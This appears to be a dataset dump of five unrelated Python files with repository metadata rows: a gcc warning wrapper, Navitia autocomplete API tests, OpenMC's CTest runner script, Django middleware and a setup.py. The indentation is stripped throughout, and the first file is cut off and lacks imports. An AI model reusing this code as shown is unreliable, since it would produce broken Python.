import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"alignment.c:720",
"async.c:122",
"async.c:270",
"dir.c:43",
"dm.c:1053",
"dm.c:1080",
"dm-table.c:1120",
"dm-table.c:1126",
"drm_edid.c:1303",
"eventpoll.c:1143",
"f_mass_storage.c:3368",
"inode.c:72",
"inode.c:73",
"inode.c:74",
"msm_sdcc.c:126",
"msm_sdcc.c:128",
"nf_conntrack_netlink.c:790",
"nf_nat_standalone.c:118",
"return_address.c:61",
"soc-core.c:1719",
"xt_log.h:50",
])
# Capture the name of the object file, can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
# if m and m.group(2) not in allowed_warnings:
# print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
# if ofile:
# try:
# os.remove(ofile)
# except OSError:
# pass
# sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
| gpl-2.0 | -2,623,976,439,378,806,300 | 32.17757 | 97 | 0.663099 | false |
CanalTP/navitia | source/tyr/tests/integration/autocomplete_test.py | 1 | 11540 | # coding: utf-8
# Copyright (c) 2001-2018, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# channel `#navitia` on riot https://riot.im/app/#/room/#navitia:matrix.org
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, division, unicode_literals
from tests.check_utils import api_get, api_post, api_delete, api_put, _dt
import json
import pytest
import jmespath
from navitiacommon import models
from tyr import app
@pytest.fixture
def create_autocomplete_parameter():
with app.app_context():
autocomplete_param = models.AutocompleteParameter('idf', 'OSM', 'BANO', 'FUSIO', 'OSM', [8, 9])
models.db.session.add(autocomplete_param)
models.db.session.commit()
# we also create 3 datasets, one for bano, 2 for osm
for i, dset_type in enumerate(['bano', 'osm', 'osm']):
job = models.Job()
dataset = models.DataSet()
dataset.type = dset_type
dataset.family_type = 'autocomplete_{}'.format(dataset.type)
dataset.name = '/path/to/dataset_{}'.format(i)
models.db.session.add(dataset)
job.autocomplete_params_id = autocomplete_param.id
job.data_sets.append(dataset)
job.state = 'done'
models.db.session.add(job)
models.db.session.commit()
@pytest.fixture
def create_two_autocomplete_parameters():
with app.app_context():
autocomplete_param1 = models.AutocompleteParameter('europe', 'OSM', 'BANO', 'OSM', 'OSM', [8, 9])
autocomplete_param2 = models.AutocompleteParameter('france', 'OSM', 'OSM', 'FUSIO', 'OSM', [8, 9])
models.db.session.add(autocomplete_param1)
models.db.session.add(autocomplete_param2)
models.db.session.commit()
@pytest.fixture
def autocomplete_parameter_json():
return {
"name": "peru",
"street": "OSM",
"address": "BANO",
"poi": "FUSIO",
"admin": "OSM",
"admin_level": [8],
}
def test_get_autocomplete_parameters_empty():
resp = api_get('/v0/autocomplete_parameters/')
assert resp == []
def test_get_all_autocomplete(create_autocomplete_parameter):
resp = api_get('/v0/autocomplete_parameters/')
assert len(resp) == 1
assert resp[0]['name'] == 'idf'
assert resp[0]['street'] == 'OSM'
assert resp[0]['address'] == 'BANO'
assert resp[0]['poi'] == 'FUSIO'
assert resp[0]['admin'] == 'OSM'
assert resp[0]['admin_level'] == [8, 9]
assert not resp[0]['config_toml']
def test_get_autocomplete_by_name(create_two_autocomplete_parameters):
resp = api_get('/v0/autocomplete_parameters/')
assert len(resp) == 2
resp = api_get('/v0/autocomplete_parameters/france')
assert resp['name'] == 'france'
assert resp['street'] == 'OSM'
assert resp['address'] == 'OSM'
assert resp['poi'] == 'FUSIO'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8, 9]
assert not resp['config_toml']
def test_post_autocomplete(autocomplete_parameter_json):
resp = api_post(
'/v0/autocomplete_parameters',
data=json.dumps(autocomplete_parameter_json),
content_type='application/json',
)
assert resp['name'] == 'peru'
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'FUSIO'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8]
assert not resp['config_toml']
def test_post_autocomplete_cosmo():
resp = api_post(
'/v0/autocomplete_parameters',
data=json.dumps({"name": "bobette", "admin": "COSMOGONY"}),
content_type='application/json',
)
assert resp['name'] == 'bobette'
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'OSM'
assert resp['admin'] == 'COSMOGONY'
assert resp['admin_level'] == []
assert not resp['config_toml']
def test_put_autocomplete(create_two_autocomplete_parameters, autocomplete_parameter_json):
resp = api_get('/v0/autocomplete_parameters/france')
assert resp['name'] == 'france'
assert resp['street'] == 'OSM'
assert resp['address'] == 'OSM'
assert resp['poi'] == 'FUSIO'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8, 9]
assert not resp['config_toml']
resp = api_put(
'/v0/autocomplete_parameters/france',
data=json.dumps(autocomplete_parameter_json),
content_type='application/json',
)
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'FUSIO'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8]
assert not resp['config_toml']
def test_create_autocomplete_with_config_toml():
json_with_config_toml = {
"name": "bobette",
"address": "BANO",
"admin": "OSM",
"admin_level": [8],
"config_toml": "dataset = \"bobette\"\n\n[admin]\nimport = true\ncity_level = 8\nlevels = [8]\n\n"
"[way]\nimport = true\n\n[poi]\nimport = true\n",
"poi": "OSM",
"street": "OSM",
}
resp = api_post(
'/v0/autocomplete_parameters', data=json.dumps(json_with_config_toml), content_type='application/json'
)
assert resp['name'] == json_with_config_toml["name"]
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'OSM'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8]
assert resp['config_toml'] == json_with_config_toml["config_toml"]
def test_put_autocomplete_with_config_toml_not_in_database():
json_with_config_toml = {
"name": "bobette",
"address": "BANO",
"admin": "OSM",
"admin_level": [8],
"config_toml": "dataset = \"bobette\"\n\n[admin]\nimport = true\ncity_level = 8\nlevels = [8]\n\n"
"[way]\nimport = true\n\n[poi]\nimport = true\n",
"poi": "OSM",
"street": "OSM",
}
resp, status_code = api_put(
'/v0/autocomplete_parameters/bobette',
data=json.dumps(json_with_config_toml),
content_type='application/json',
check=False,
)
assert status_code == 201
assert resp['name'] == json_with_config_toml["name"]
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'OSM'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8]
assert resp['config_toml'] == json_with_config_toml["config_toml"]
def test_delete_autocomplete(create_two_autocomplete_parameters):
resp = api_get('/v0/autocomplete_parameters/')
assert len(resp) == 2
resp = api_get('/v0/autocomplete_parameters/france')
assert resp['name'] == 'france'
_, status = api_delete('/v0/autocomplete_parameters/france', check=False, no_json=True)
assert status == 204
_, status = api_get('/v0/autocomplete_parameters/france', check=False)
assert status == 404
resp = api_get('/v0/autocomplete_parameters/')
assert len(resp) == 1
def test_get_last_datasets_autocomplete(create_autocomplete_parameter):
"""
we query the loaded datasets of idf
we loaded 3 datasets, but by default we should get one by family_type, so one for bano, one for osm
"""
resp = api_get('/v0/autocomplete_parameters/idf/last_datasets')
assert len(resp) == 2
bano = next((d for d in resp if d['type'] == 'bano'), None)
assert bano
assert bano['family_type'] == 'autocomplete_bano'
assert bano['name'] == '/path/to/dataset_0'
osm = next((d for d in resp if d['type'] == 'osm'), None)
assert osm
assert osm['family_type'] == 'autocomplete_osm'
assert osm['name'] == '/path/to/dataset_2' # we should have the last one
# if we ask for the 2 last datasets per type, we got all of them
resp = api_get('/v0/autocomplete_parameters/idf/last_datasets?count=2')
assert len(resp) == 3
@pytest.fixture
def minimal_poi_types_json():
return {
"poi_types": [
{"id": "amenity:bicycle_rental", "name": "Station VLS"},
{"id": "amenity:parking", "name": "Parking"},
],
"rules": [
{
"osm_tags_filters": [{"key": "amenity", "value": "bicycle_rental"}],
"poi_type_id": "amenity:bicycle_rental",
},
{"osm_tags_filters": [{"key": "amenity", "value": "parking"}], "poi_type_id": "amenity:parking"},
],
}
def test_autocomplete_poi_types(create_two_autocomplete_parameters, minimal_poi_types_json):
resp = api_get('/v0/autocomplete_parameters/france')
assert resp['name'] == 'france'
# POST a minimal conf
resp = api_post(
'/v0/autocomplete_parameters/france/poi_types',
data=json.dumps(minimal_poi_types_json),
content_type='application/json',
)
def test_minimal_conf(resp):
assert len(resp['poi_types']) == 2
assert len(resp['rules']) == 2
bss_type = jmespath.search("poi_types[?id=='amenity:bicycle_rental']", resp)
assert len(bss_type) == 1
assert bss_type[0]['name'] == 'Station VLS'
bss_rule = jmespath.search("rules[?poi_type_id=='amenity:bicycle_rental']", resp)
assert len(bss_rule) == 1
assert bss_rule[0]['osm_tags_filters'][0]['value'] == 'bicycle_rental'
# check that it's not the "default" conf
assert not jmespath.search("poi_types[?id=='amenity:townhall']", resp)
# check that the conf is correctly set on france
test_minimal_conf(resp)
# check that the conf on europe is still empty
resp = api_get('/v0/autocomplete_parameters/europe/poi_types')
assert not resp
# check GET of newly defined france conf
resp = api_get('/v0/autocomplete_parameters/france/poi_types')
test_minimal_conf(resp)
# check DELETE of france conf
resp, code = api_delete('/v0/autocomplete_parameters/france/poi_types', check=False, no_json=True)
assert not resp
assert code == 204
# check get of conf on france is now empty
resp = api_get('/v0/autocomplete_parameters/france/poi_types')
assert not resp
# check that tyr refuses incorrect conf
resp, code = api_post(
'/v0/autocomplete_parameters/france/poi_types',
data=json.dumps({'poi_types': [{'id': 'bob', 'name': 'Bob'}]}),
content_type='application/json',
check=False,
)
assert code == 400
assert resp['status'] == 'error'
assert 'rules' in resp['message']
| agpl-3.0 | 7,122,653,603,733,621,000 | 33.550898 | 110 | 0.62175 | false |
samuelshaner/openmc | tests/run_tests.py | 1 | 17900 | #!/usr/bin/env python
from __future__ import print_function
import os
import sys
import shutil
import re
import glob
import socket
from subprocess import call, check_output
from collections import OrderedDict
from optparse import OptionParser
# Command line parsing
parser = OptionParser()
parser.add_option('-j', '--parallel', dest='n_procs', default='1',
help="Number of parallel jobs.")
parser.add_option('-R', '--tests-regex', dest='regex_tests',
help="Run tests matching regular expression. \
Test names are the directories present in tests folder.\
This uses standard regex syntax to select tests.")
parser.add_option('-C', '--build-config', dest='build_config',
help="Build configurations matching regular expression. \
Specific build configurations can be printed out with \
optional argument -p, --print. This uses standard \
regex syntax to select build configurations.")
parser.add_option('-l', '--list', action="store_true",
dest="list_build_configs", default=False,
help="List out build configurations.")
parser.add_option("-p", "--project", dest="project", default="",
help="project name for build")
parser.add_option("-D", "--dashboard", dest="dash",
help="Dash name -- Experimental, Nightly, Continuous")
parser.add_option("-u", "--update", action="store_true", dest="update",
help="Allow CTest to update repo. (WARNING: may overwrite\
changes that were not pushed.")
parser.add_option("-s", "--script", action="store_true", dest="script",
help="Activate CTest scripting mode for coverage, valgrind\
and dashboard capability.")
(options, args) = parser.parse_args()
# Default compiler paths
FC='gfortran'
CC='gcc'
MPI_DIR='/opt/mpich/3.2-gnu'
HDF5_DIR='/opt/hdf5/1.8.16-gnu'
PHDF5_DIR='/opt/phdf5/1.8.16-gnu'
# Script mode for extra capability
script_mode = False
# Override default compiler paths if environmental vars are found
if 'FC' in os.environ:
FC = os.environ['FC']
if 'CC' in os.environ:
CC = os.environ['CC']
if 'MPI_DIR' in os.environ:
MPI_DIR = os.environ['MPI_DIR']
if 'HDF5_DIR' in os.environ:
HDF5_DIR = os.environ['HDF5_DIR']
if 'PHDF5_DIR' in os.environ:
PHDF5_DIR = os.environ['PHDF5_DIR']
# CTest script template
ctest_str = """set (CTEST_SOURCE_DIRECTORY "{source_dir}")
set (CTEST_BINARY_DIRECTORY "{build_dir}")
set(CTEST_SITE "{host_name}")
set (CTEST_BUILD_NAME "{build_name}")
set (CTEST_CMAKE_GENERATOR "Unix Makefiles")
set (CTEST_BUILD_OPTIONS "{build_opts}")
set(CTEST_UPDATE_COMMAND "git")
set(CTEST_CONFIGURE_COMMAND "${{CMAKE_COMMAND}} -H${{CTEST_SOURCE_DIRECTORY}} -B${{CTEST_BINARY_DIRECTORY}} ${{CTEST_BUILD_OPTIONS}}")
set(CTEST_MEMORYCHECK_COMMAND "{valgrind_cmd}")
set(CTEST_MEMORYCHECK_COMMAND_OPTIONS "--tool=memcheck --leak-check=yes --show-reachable=yes --num-callers=20 --track-fds=yes")
#set(CTEST_MEMORYCHECK_SUPPRESSIONS_FILE ${{CTEST_SOURCE_DIRECTORY}}/../tests/valgrind.supp)
set(MEM_CHECK {mem_check})
if(MEM_CHECK)
set(ENV{{MEM_CHECK}} ${{MEM_CHECK}})
endif()
set(CTEST_COVERAGE_COMMAND "gcov")
set(COVERAGE {coverage})
set(ENV{{COVERAGE}} ${{COVERAGE}})
{subproject}
ctest_start("{dashboard}")
ctest_configure(RETURN_VALUE res)
{update}
ctest_build(RETURN_VALUE res)
if(NOT MEM_CHECK)
ctest_test({tests} PARALLEL_LEVEL {n_procs}, RETURN_VALUE res)
endif()
if(MEM_CHECK)
ctest_memcheck({tests} RETURN_VALUE res)
endif(MEM_CHECK)
if(COVERAGE)
ctest_coverage(RETURN_VALUE res)
endif(COVERAGE)
{submit}
if (res EQUAL 0)
else()
message(FATAL_ERROR "")
endif()
"""
# Define test data structure
tests = OrderedDict()
def cleanup(path):
"""Remove generated output files."""
for dirpath, dirnames, filenames in os.walk(path):
for fname in filenames:
for ext in ['.h5', '.ppm', '.voxel']:
if fname.endswith(ext) and fname != '1d_mgxs.h5':
os.remove(os.path.join(dirpath, fname))
def which(program):
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
class Test(object):
def __init__(self, name, debug=False, optimize=False, mpi=False, openmp=False,
phdf5=False, valgrind=False, coverage=False):
self.name = name
self.debug = debug
self.optimize = optimize
self.mpi = mpi
self.openmp = openmp
self.phdf5 = phdf5
self.valgrind = valgrind
self.coverage = coverage
self.success = True
self.msg = None
self.skipped = False
self.cmake = ['cmake', '-H..', '-Bbuild',
'-DPYTHON_EXECUTABLE=' + sys.executable]
# Check for MPI
if self.mpi:
if os.path.exists(os.path.join(MPI_DIR, 'bin', 'mpifort')):
self.fc = os.path.join(MPI_DIR, 'bin', 'mpifort')
else:
self.fc = os.path.join(MPI_DIR, 'bin', 'mpif90')
self.cc = os.path.join(MPI_DIR, 'bin', 'mpicc')
else:
self.fc = FC
self.cc = CC
# Sets the build name that will show up on the CDash
def get_build_name(self):
self.build_name = options.project + '_' + self.name
return self.build_name
# Sets up build options for various tests. It is used both
# in script and non-script modes
def get_build_opts(self):
build_str = ""
if self.debug:
build_str += "-Ddebug=ON "
if self.optimize:
build_str += "-Doptimize=ON "
if self.openmp:
build_str += "-Dopenmp=ON "
if self.coverage:
build_str += "-Dcoverage=ON "
self.build_opts = build_str
return self.build_opts
# Write out the ctest script to tests directory
def create_ctest_script(self, ctest_vars):
with open('ctestscript.run', 'w') as fh:
fh.write(ctest_str.format(**ctest_vars))
# Runs the ctest script which performs all the cmake/ctest/cdash
def run_ctest_script(self):
os.environ['FC'] = self.fc
os.environ['CC'] = self.cc
if self.mpi:
os.environ['MPI_DIR'] = MPI_DIR
if self.phdf5:
os.environ['HDF5_ROOT'] = PHDF5_DIR
else:
os.environ['HDF5_ROOT'] = HDF5_DIR
rc = call(['ctest', '-S', 'ctestscript.run','-V'])
if rc != 0:
self.success = False
self.msg = 'Failed on ctest script.'
# Runs cmake when in non-script mode
def run_cmake(self):
os.environ['FC'] = self.fc
os.environ['CC'] = self.cc
if self.mpi:
os.environ['MPI_DIR'] = MPI_DIR
if self.phdf5:
os.environ['HDF5_ROOT'] = PHDF5_DIR
else:
os.environ['HDF5_ROOT'] = HDF5_DIR
build_opts = self.build_opts.split()
self.cmake += build_opts
rc = call(self.cmake)
if rc != 0:
self.success = False
self.msg = 'Failed on cmake.'
# Runs make when in non-script mode
def run_make(self):
if not self.success:
return
# Default make string
make_list = ['make','-s']
# Check for parallel
if options.n_procs is not None:
make_list.append('-j')
make_list.append(options.n_procs)
# Run make
rc = call(make_list)
if rc != 0:
self.success = False
self.msg = 'Failed on make.'
# Runs ctest when in non-script mode
def run_ctests(self):
if not self.success:
return
# Default ctest string
ctest_list = ['ctest']
# Check for parallel
if options.n_procs is not None:
ctest_list.append('-j')
ctest_list.append(options.n_procs)
# Check for subset of tests
if options.regex_tests is not None:
ctest_list.append('-R')
ctest_list.append(options.regex_tests)
# Run ctests
rc = call(ctest_list)
if rc != 0:
self.success = False
self.msg = 'Failed on testing.'
# Simple function to add a test to the global tests dictionary
def add_test(name, debug=False, optimize=False, mpi=False, openmp=False,\
phdf5=False, valgrind=False, coverage=False):
tests.update({name: Test(name, debug, optimize, mpi, openmp, phdf5,
valgrind, coverage)})
# List of all tests that may be run. User can add -C to command line to specify
# a subset of these configurations
add_test('hdf5-normal')
add_test('hdf5-debug', debug=True)
add_test('hdf5-optimize', optimize=True)
add_test('omp-hdf5-normal', openmp=True)
add_test('omp-hdf5-debug', openmp=True, debug=True)
add_test('omp-hdf5-optimize', openmp=True, optimize=True)
add_test('mpi-hdf5-normal', mpi=True)
add_test('mpi-hdf5-debug', mpi=True, debug=True)
add_test('mpi-hdf5-optimize', mpi=True, optimize=True)
add_test('phdf5-normal', mpi=True, phdf5=True)
add_test('phdf5-debug', mpi=True, phdf5=True, debug=True)
add_test('phdf5-optimize', mpi=True, phdf5=True, optimize=True)
add_test('phdf5-omp-normal', mpi=True, phdf5=True, openmp=True)
add_test('phdf5-omp-debug', mpi=True, phdf5=True, openmp=True, debug=True)
add_test('phdf5-omp-optimize', mpi=True, phdf5=True, openmp=True, optimize=True)
add_test('hdf5-debug_valgrind', debug=True, valgrind=True)
add_test('hdf5-debug_coverage', debug=True, coverage=True)
# Check to see if we should just print build configuration information to user
if options.list_build_configs:
for key in tests:
print('Configuration Name: {0}'.format(key))
print(' Debug Flags:..........{0}'.format(tests[key].debug))
print(' Optimization Flags:...{0}'.format(tests[key].optimize))
print(' MPI Active:...........{0}'.format(tests[key].mpi))
print(' OpenMP Active:........{0}'.format(tests[key].openmp))
print(' Valgrind Test:........{0}'.format(tests[key].valgrind))
print(' Coverage Test:........{0}\n'.format(tests[key].coverage))
exit()
# Delete items of dictionary that don't match regular expression
if options.build_config is not None:
to_delete = []
for key in tests:
if not re.search(options.build_config, key):
to_delete.append(key)
for key in to_delete:
del tests[key]
# Check for dashboard and determine whether to push results to server
# Note that there are only 3 basic dashboards:
# Experimental, Nightly, Continuous. On the CDash end, these can be
# reorganized into groups when a hostname, dashboard and build name
# are matched.
if options.dash is None:
dash = 'Experimental'
submit = ''
else:
dash = options.dash
submit = 'ctest_submit()'
# Check for update command, which will run git fetch/merge and will delete
# any changes to repo that were not pushed to remote origin
if options.update:
update = 'ctest_update()'
else:
update = ''
# Check for CTest scipts mode
# Sets up whether we should use just the basic ctest command or use
# CTest scripting to perform tests.
if not options.dash is None or options.script:
script_mode = True
else:
script_mode = False
# Setup CTest script vars. Not used in non-script mode
pwd = os.getcwd()
ctest_vars = {
'source_dir': os.path.join(pwd, os.pardir),
'build_dir': os.path.join(pwd, 'build'),
'host_name': socket.gethostname(),
'dashboard': dash,
'submit': submit,
'update': update,
'n_procs': options.n_procs
}
# Check project name
subprop = """set_property(GLOBAL PROPERTY SubProject {0})"""
if options.project == "" :
ctest_vars.update({'subproject':''})
elif options.project == 'develop':
ctest_vars.update({'subproject':''})
else:
ctest_vars.update({'subproject':subprop.format(options.project)})
# Set up default valgrind tests (subset of all tests)
# Currently takes too long to run all the tests with valgrind
# Only used in script mode
valgrind_default_tests = "cmfd_feed|confidence_intervals|\
density|eigenvalue_genperbatch|energy_grid|entropy|\
lattice_multiple|output|plotreflective_plane|\
rotation|salphabetascore_absorption|seed|source_energy_mono|\
sourcepoint_batch|statepoint_interval|survival_biasing|\
tally_assumesep|translation|uniform_fs|universe|void"
# Delete items of dictionary if valgrind or coverage and not in script mode
to_delete = []
if not script_mode:
for key in tests:
if re.search('valgrind|coverage', key):
to_delete.append(key)
for key in to_delete:
del tests[key]
# Check if tests empty
if len(list(tests.keys())) == 0:
print('No tests to run.')
exit()
# Begin testing
shutil.rmtree('build', ignore_errors=True)
cleanup('.')
for key in iter(tests):
test = tests[key]
# Extra display if not in script mode
if not script_mode:
print('-'*(len(key) + 6))
print(key + ' tests')
print('-'*(len(key) + 6))
sys.stdout.flush()
# Verify fortran compiler exists
if which(test.fc) is None:
self.msg = 'Compiler not found: {0}'.format(test.fc)
self.success = False
continue
# Verify valgrind command exists
if test.valgrind:
valgrind_cmd = which('valgrind')
if valgrind_cmd is None:
self.msg = 'No valgrind executable found.'
self.success = False
continue
else:
valgrind_cmd = ''
# Verify gcov/lcov exist
if test.coverage:
if which('gcov') is None:
self.msg = 'No {} executable found.'.format(exe)
self.success = False
continue
# Set test specific CTest script vars. Not used in non-script mode
ctest_vars.update({'build_name': test.get_build_name()})
ctest_vars.update({'build_opts': test.get_build_opts()})
ctest_vars.update({'mem_check': test.valgrind})
ctest_vars.update({'coverage': test.coverage})
ctest_vars.update({'valgrind_cmd': valgrind_cmd})
# Check for user custom tests
# INCLUDE is a CTest command that allows for a subset
# of tests to be executed. Only used in script mode.
if options.regex_tests is None:
ctest_vars.update({'tests' : ''})
# No user tests, use default valgrind tests
if test.valgrind:
ctest_vars.update({'tests' : 'INCLUDE {0}'.
format(valgrind_default_tests)})
else:
ctest_vars.update({'tests' : 'INCLUDE {0}'.
format(options.regex_tests)})
# Main part of code that does the ctest execution.
# It is broken up by two modes, script and non-script
if script_mode:
# Create ctest script
test.create_ctest_script(ctest_vars)
# Run test
test.run_ctest_script()
else:
# Run CMAKE to configure build
test.run_cmake()
# Go into build directory
os.chdir('build')
# Build OpenMC
test.run_make()
# Run tests
test.run_ctests()
# Leave build directory
os.chdir(os.pardir)
# Copy over log file
if script_mode:
logfile = glob.glob('build/Testing/Temporary/LastTest_*.log')
else:
logfile = glob.glob('build/Testing/Temporary/LastTest.log')
if len(logfile) > 0:
logfilename = os.path.split(logfile[0])[1]
logfilename = os.path.splitext(logfilename)[0]
logfilename = logfilename + '_{0}.log'.format(test.name)
shutil.copy(logfile[0], logfilename)
# For coverage builds, use lcov to generate HTML output
if test.coverage:
if which('lcov') is None or which('genhtml') is None:
print('No lcov/genhtml command found. '
'Could not generate coverage report.')
else:
shutil.rmtree('coverage', ignore_errors=True)
call(['lcov', '--directory', '.', '--capture',
'--output-file', 'coverage.info'])
call(['genhtml', '--output-directory', 'coverage', 'coverage.info'])
os.remove('coverage.info')
if test.valgrind:
# Copy memcheck output to memcheck directory
shutil.rmtree('memcheck', ignore_errors=True)
os.mkdir('memcheck')
memcheck_out = glob.glob('build/Testing/Temporary/MemoryChecker.*.log')
for fname in memcheck_out:
shutil.copy(fname, 'memcheck/')
# Remove generated XML files
xml_files = check_output(['git', 'ls-files', '.', '--exclude-standard',
'--others']).split()
for f in xml_files:
os.remove(f)
# Clear build directory and remove binary and hdf5 files
shutil.rmtree('build', ignore_errors=True)
if script_mode:
os.remove('ctestscript.run')
cleanup('.')
# Print out summary of results
print('\n' + '='*54)
print('Summary of Compilation Option Testing:\n')
if sys.stdout.isatty():
OK = '\033[92m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
else:
OK = ''
FAIL = ''
ENDC = ''
BOLD = ''
return_code = 0
for test in tests:
print(test + '.'*(50 - len(test)), end='')
if tests[test].success:
print(BOLD + OK + '[OK]' + ENDC)
else:
print(BOLD + FAIL + '[FAILED]' + ENDC)
print(' '*len(test)+tests[test].msg)
return_code = 1
sys.exit(return_code)
| mit | -5,832,388,550,918,468,000 | 31.965009 | 134 | 0.611955 | false |
tsotetsi/textily-web | temba/middleware.py | 1 | 5471 | from __future__ import absolute_import, unicode_literals
import pstats
import traceback
import copy
from cStringIO import StringIO
from django.conf import settings
from django.db import transaction
from django.utils import timezone, translation
from temba.orgs.models import Org
from temba.contacts.models import Contact
try:
import cProfile as profile
except ImportError: # pragma: no cover
import profile
class ExceptionMiddleware(object):
def process_exception(self, request, exception):
if settings.DEBUG:
traceback.print_exc(exception)
return None
class BrandingMiddleware(object):
@classmethod
def get_branding_for_host(cls, host):
# ignore subdomains
if len(host.split('.')) > 2: # pragma: needs cover
host = '.'.join(host.split('.')[-2:])
# prune off the port
if ':' in host:
host = host[0:host.rindex(':')]
# our default branding
branding = settings.BRANDING.get(settings.DEFAULT_BRAND)
branding['host'] = settings.DEFAULT_BRAND
# override with site specific branding if we have that
site_branding = settings.BRANDING.get(host, None)
if site_branding:
branding = copy.deepcopy(branding)
branding.update(site_branding)
branding['host'] = host
return branding
def process_request(self, request):
"""
Check for any branding options based on the current host
"""
host = 'localhost'
try:
host = request.get_host()
except Exception: # pragma: needs cover
traceback.print_exc()
request.branding = BrandingMiddleware.get_branding_for_host(host)
class ActivateLanguageMiddleware(object):
def process_request(self, request):
user = request.user
language = request.branding.get('language', settings.DEFAULT_LANGUAGE)
if user.is_anonymous() or user.is_superuser:
translation.activate(language)
else:
user_settings = user.get_settings()
translation.activate(user_settings.language)
class OrgTimezoneMiddleware(object):
def process_request(self, request):
user = request.user
org = None
if not user.is_anonymous():
org_id = request.session.get('org_id', None)
if org_id:
org = Org.objects.filter(is_active=True, pk=org_id).first()
# only set the org if they are still a user or an admin
if org and (user.is_superuser or user.is_staff or user in org.get_org_users()):
user.set_org(org)
# otherwise, show them what orgs are available
else:
user_orgs = user.org_admins.all() | user.org_editors.all() | user.org_viewers.all() | user.org_surveyors.all()
user_orgs = user_orgs.distinct('pk')
if user_orgs.count() == 1:
user.set_org(user_orgs[0])
org = request.user.get_org()
if org:
timezone.activate(org.timezone)
else:
timezone.activate(settings.USER_TIME_ZONE)
return None
class FlowSimulationMiddleware(object):
def process_request(self, request):
Contact.set_simulation(False)
return None
class ProfilerMiddleware(object): # pragma: no cover
"""
Simple profile middleware to profile django views. To run it, add ?prof to
the URL like this:
http://localhost:8000/view/?prof
Optionally pass the following to modify the output:
?sort => Sort the output by a given metric. Default is time.
See http://docs.python.org/2/library/profile.html#pstats.Stats.sort_stats
for all sort options.
?count => The number of rows to display. Default is 100.
This is adapted from an example found here:
http://www.slideshare.net/zeeg/django-con-high-performance-django-presentation.
"""
def can(self, request):
return settings.DEBUG and 'prof' in request.GET
def process_view(self, request, callback, callback_args, callback_kwargs):
if self.can(request):
self.profiler = profile.Profile()
args = (request,) + callback_args
return self.profiler.runcall(callback, *args, **callback_kwargs)
def process_response(self, request, response):
if self.can(request):
self.profiler.create_stats()
io = StringIO()
stats = pstats.Stats(self.profiler, stream=io)
stats.strip_dirs().sort_stats(request.GET.get('sort', 'time'))
stats.print_stats(int(request.GET.get('count', 100)))
response.content = '<pre>%s</pre>' % io.getvalue()
return response
class NonAtomicGetsMiddleware(object):
"""
Django's non_atomic_requests decorator gives us no way of enabling/disabling transactions depending on the request
type. This middleware will make the current request non-atomic if an _non_atomic_gets attribute is set on the view
function, and if the request method is GET.
"""
def process_view(self, request, view_func, view_args, view_kwargs):
if getattr(view_func, '_non_atomic_gets', False):
if request.method.lower() == 'get':
transaction.non_atomic_requests(view_func)
else:
view_func._non_atomic_requests = set()
return None
| agpl-3.0 | 4,714,688,521,143,626,000 | 31.182353 | 126 | 0.628039 | false |
vuolter/autoupgrade | setup.py | 1 | 1152 | # -*- coding: utf-8 -*-
from setuptools import setup
setup(
name="autoupgrade-ng",
version="0.3.0",
author="Walter Purcaro",
author_email="[email protected]",
description="Automatic upgrade of PyPI packages",
long_description=open('README.rst').read(),
keywords=['autoupgrade', 'pip-upgrade', 'pip'],
packages=['autoupgrade'],
include_package_data=True,
url="https://github.com/vuolter/autoupgrade",
download_url="https://github.com/vuolter/autoupgrade/releases",
install_requires=['pip'],
obsoletes=['autoupgrade'],
license='MIT License',
zip_safe=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Other Environment",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: System :: Software Distribution",
"Topic :: Utilities"
]
)
| mit | -4,360,612,504,642,803,000 | 32.882353 | 67 | 0.626736 | false |
